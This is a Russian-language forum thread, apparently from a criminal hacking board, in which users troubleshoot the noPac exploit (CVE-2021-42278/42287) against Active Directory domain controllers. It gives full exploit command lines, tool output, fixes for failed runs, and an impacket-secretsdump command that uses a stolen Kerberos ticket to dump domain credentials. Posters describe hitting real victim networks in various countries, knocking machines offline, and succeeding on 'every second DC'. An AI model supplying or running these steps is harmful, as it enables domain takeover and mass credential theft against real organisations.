Remote Sam-the-Admin CVE-2021-42278 - Name impersonation + CVE-2021-42287 - KDC bamboozling

[Yes]

Не подскажете что за ошибка?
SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME
Пробовал через флаг указывать разные имена для комп. аккаунта, ничего не получается, также с разных юзеров пытался

 

[pstdocx]

Какой PoC используешь ?
Какой командой запускаешь ?
Откуда запускаешь?

Не подскажете что за ошибка?
SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME
Пробовал через флаг указывать разные имена для комп. аккаунта, ничего не получается, также с разных юзеров пытался

а по ошибке: The name provided is not a properly formed account name. скорее всего не правильно указал имя юзера - фкдн не полный мб, скидывай лог посмотрим

 

[Yes]

python noPac.py KVHS-LM.local/user:pass -dc-ip 192.168.0.201 --impersonate administrator -dump -use-ldap

[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: 01S-VERW
[*] 1: 10S-WEL-DC
>>> Your choice: 0
[*] Selected Target 01s-verw.kvhs-lm.local
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-0FI8TMGDRFB"
[*] MachineAccount "WIN-0FI8TMGDRFB" password = #uqub#ubNaQP
[-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

Kak-to tak

 

[ibenji]

Connection reset by peer и тачка уходит в офф, у кого такое было как пофиксить или АВ палит ? пробовал разные экспы, пока такое заметил только на франции,с другими ок все, 2 таргета так в офф ушло

 

[ibenji]

[*] Selected Target dcsrv01.domain.local
list index out of range и всё. Юзер доменный. WazeHell использую. Хде я накосячил?

из за разницы языков , так как сетка не на инглише.
если сеть на испанском, итальянском и т.д.
например, у меня сетка на немецком , я в файле utils/helper.py заменил Domain Admins на Domänen-Admins ,
307 строка кода : '(sAMAccountName=%s)' % escape_filter_chars("Domänen-Admins"), после чего у меня все заработало

 

[pstdocx]

python noPac.py KVHS-LM.local/user:pass -dc-ip 192.168.0.201 --impersonate administrator -dump -use-ldap

[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: 01S-VERW
[*] 1: 10S-WEL-DC
>>> Your choice: 0
[*] Selected Target 01s-verw.kvhs-lm.local
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-0FI8TMGDRFB"
[*] MachineAccount "WIN-0FI8TMGDRFB" password = #uqub#ubNaQP
[-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

Kak-to tak

уверен что правильно креды указал? пароль в одинарных кавычках должен быть, и символы нужно экранировать
если с кали запускаешь то добавь обратный слеш перед каждым символом в пароле, который выделяется голубым цветом
тут ошибка явно в кредах)

P.S. если не хочешь в паблик креды кидать, можешь отписать в пм там подскажу
P.S.2. креды должны быть валидными ад кредами

 

[ibenji]

уверен что правильно креды указал? пароль в одинарных кавычках должен быть, и символы нужно экранировать
если с кали запускаешь то добавь обратный слеш перед каждым символом в пароле, который выделяется голубым цветом
тут ошибка явно в кредах)

P.S. если не хочешь в паблик креды кидать, можешь отписать в пм там подскажу
P.S.2. креды должны быть валидными ад кредами

у меня тоже часто эта ошибка, хотя имя хоста указываю верно. хз в чем проблема... креды в кавычках domain/user:'pass '

 

[pstdocx]

у меня тоже часто эта ошибка, хотя имя хоста указываю верно. хз в чем проблема... креды в кавычках domain/user:'pass '

пароль надо экранировать) в этом дело

 

[Yes]

пароль надо экранировать) в этом дело

Ответ, конечно, поздний, но я вроде разобрался, юзая первый эксплойт эта ошибка может обозначать что цель пропатчена. Проверял на разных эксплойтах, который второй из поста пишет что не уязвима тачка. Еще может быть надо юзать под каждую страну свой язык "Доменные Администраторы", я не знал про это и мой пример был Германия. Креды можно писать хоть без ковычек, вообще похуй, если юзаете винду и там нету амперсанда или тип того, а так ковычки любые кушает.

 

[C0rtex]

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

Ребята вот такую херню выдавало кому не? никто не вкурсе что за ошибка и с чем она связана

 

[mixl]

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

Ребята вот такую херню выдавало кому не? никто не вкурсе что за ошибка и с чем она связана

ловил, пробуй под разными админами хэши снимать, обычно помогает)

 

[Desconocido]

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

Ребята вот такую херню выдавало кому не? никто не вкурсе что за ошибка и с чем она связана

у меня тоже такое бывает, вот что помогло

[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: DC02
[*] 1: DC01-0
>>> Your choice: 1
[*] Selected Target dc01-0.domain.local
[*] will try to impersonat administrator
[*] Alreay have user administrator ticket for target dc01-0.domain.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)




KRB5CCNAME='administrator_dc01-0.domain.local.ccache' /usr/bin/impacket-secretsdump -target-ip dc01-0.domain.local -dc-ip dc01-0.domain.local -k -no-pass @'dc01-0.domain.local'

 

[C0rtex]

у меня тоже такое бывает, вот что помогло

чет не врубился? и что тебе помогло, вместо ip прописывать название dc? или ты про secretsdump,

 

[Desconocido]

чет не врубился? и что тебе помогло, вместо ip прописывать название dc? или ты про secretsdump,

я имею ввиду, что с помощью KRB5CCNAME указываешь путь до файла .ccache который сохранил эксп и дампишь через secretsdump креды.потому что другой эксп у меня пишет вот такое "
Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)"

 

[bbi34yy]

Спасибо всем, кто делится тут знаниями.
А как часто срабатывает, по вашей стате?

 

[C0rtex]

я имею ввиду, что с помощью KRB5CCNAME указываешь путь до файла .ccache который сохранил эксп и дампишь через secretsdump креды.потому что другой эксп у меня пишет вот такое "
Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)"

так там не нужно указывать пусть на сколько я помню потому что билет лежит прямо в папке со скриптом

 

[pstdocx]

Спасибо всем, кто делится тут знаниями.
А как часто срабатывает, по вашей стате?

каждый второй дк

 

[puertoricanec]

Всем привет, столкнулся с такой проблемой, пишет что добавляет с таким то паролем, но типо rename не может, но мне ренэйм то и нахуй не нужен, че еще надо ему?

[*] Selected Target coolsvr3.cooledge.local
[*] Total Domain Admins 5
[*] will try to impersonate rpoulin
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-79$"
[*] MachineAccount "SAMTHEADMIN-79$" password = 1BFznTQG5G1F
[*] Successfully added machine account SAMTHEADMIN-79$ with password 1BFznTQG5G1F.
[*] SAMTHEADMIN-79$ object = CN=SAMTHEADMIN-79,CN=Computers,DC=cooledge,DC=local
[-] Cannot rename the machine account , target patched

 

[C0rtex]

Всем привет, столкнулся с такой проблемой, пишет что добавляет с таким то паролем, но типо rename не может, но мне ренэйм то и нахуй не нужен, че еще надо ему?

[*] Selected Target coolsvr3.cooledge.local
[*] Total Domain Admins 5
[*] will try to impersonate rpoulin
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-79$"
[*] MachineAccount "SAMTHEADMIN-79$" password = 1BFznTQG5G1F
[*] Successfully added machine account SAMTHEADMIN-79$ with password 1BFznTQG5G1F.
[*] SAMTHEADMIN-79$ object = CN=SAMTHEADMIN-79,CN=Computers,DC=cooledge,DC=local
[-] Cannot rename the machine account , target patched

Cannot rename the machine account , target patched